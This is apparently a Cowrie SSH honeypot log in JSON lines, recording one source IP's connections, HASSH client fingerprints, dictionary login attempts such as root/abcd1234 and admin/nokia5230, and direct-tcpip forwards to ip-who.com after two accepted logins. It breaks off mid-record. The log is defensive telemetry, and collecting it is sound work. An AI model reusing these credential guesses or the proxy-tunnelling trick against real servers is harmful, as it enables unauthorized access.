{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60620,"dst_ip":"1.2.3.4","dst_port":22,"session":"953ce91d1298","protocol":"ssh","message":"New connection: 212.227.235.229:60620 (1.2.3.4:22) [session: 953ce91d1298]","sensor":"my-vps","timestamp":"2025-08-26T21:02:53.817132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:53.817973Z","src_ip":"212.227.235.229","session":"953ce91d1298"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:55.224052Z","src_ip":"212.227.235.229","session":"953ce91d1298"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:56.269095Z","src_ip":"212.227.235.229","session":"2ef2d088d5d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60626,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e6de65100d","protocol":"ssh","message":"New connection: 212.227.235.229:60626 (1.2.3.4:22) [session: f3e6de65100d]","sensor":"my-vps","timestamp":"2025-08-26T21:02:57.850579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:58.434786Z","src_ip":"212.227.235.229","session":"f3e6de65100d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:58.465216Z","src_ip":"212.227.235.229","session":"f3e6de65100d"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:03:00.527042Z","src_ip":"212.227.235.229","session":"953ce91d1298"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:03:00.885273Z","session":"953ce91d1298"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:03:01.691269Z","src_ip":"212.227.235.229","session":"953ce91d1298"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:03.506533Z","src_ip":"212.227.235.229","session":"953ce91d1298"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:03:04.379613Z","src_ip":"212.227.235.229","session":"f3e6de65100d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:03:04.653232Z","session":"f3e6de65100d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:03:05.483252Z","src_ip":"212.227.235.229","session":"f3e6de65100d"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:05.747409Z","src_ip":"212.227.235.229","session":"f3e6de65100d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47526,"dst_ip":"1.2.3.4","dst_port":22,"session":"a00270a29356","protocol":"ssh","message":"New connection: 212.227.235.229:47526 (1.2.3.4:22) [session: a00270a29356]","sensor":"my-vps","timestamp":"2025-08-26T21:03:05.946425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:03:05.978087Z","src_ip":"212.227.235.229","session":"a00270a29356"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:03:06.302187Z","src_ip":"212.227.235.229","session":"a00270a29356"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:11.684877Z","src_ip":"212.227.235.229","session":"a00270a29356"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:13.348146Z","src_ip":"212.227.235.229","session":"a00270a29356"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59592,"dst_ip":"1.2.3.4","dst_port":22,"session":"97942233a269","protocol":"ssh","message":"New connection: 212.227.235.229:59592 (1.2.3.4:22) [session: 97942233a269]","sensor":"my-vps","timestamp":"2025-08-26T21:03:19.558470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:03:19.634981Z","src_ip":"212.227.235.229","session":"97942233a269"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:03:19.814275Z","src_ip":"212.227.235.229","session":"97942233a269"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:21.206353Z","src_ip":"212.227.235.229","session":"97942233a269"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:21.665183Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:22.548322Z","src_ip":"212.227.235.229","session":"97942233a269"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28379,"dst_ip":"1.2.3.4","dst_port":22,"session":"0170087132d1","protocol":"ssh","message":"New connection: 212.227.235.229:28379 (1.2.3.4:22) [session: 0170087132d1]","sensor":"my-vps","timestamp":"2025-08-26T21:03:50.366405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:03:50.367501Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:03:50.471749Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"noreen","message":"login attempt [admin/noreen] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:50.974494Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nokia5230","message":"login attempt [admin/nokia5230] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:52.081779Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53736,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1745c316459","protocol":"ssh","message":"New connection: 212.227.235.229:53736 (1.2.3.4:22) [session: c1745c316459]","sensor":"my-vps","timestamp":"2025-08-26T21:03:52.730257Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nogard","message":"login attempt [admin/nogard] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:53.188537Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:03:54.230070Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:03:54.233861Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nika","message":"login attempt [admin/nika] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:54.296182Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nickolas","message":"login attempt [admin/nickolas] failed","sensor":"my-vps","timestamp":"2025-08-26T21:03:55.404865Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57698,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e6078152a7","protocol":"ssh","message":"New connection: 212.227.235.229:57698 (1.2.3.4:22) [session: 61e6078152a7]","sensor":"my-vps","timestamp":"2025-08-26T21:03:55.549324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:03:56.187313Z","src_ip":"212.227.235.229","session":"61e6078152a7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","e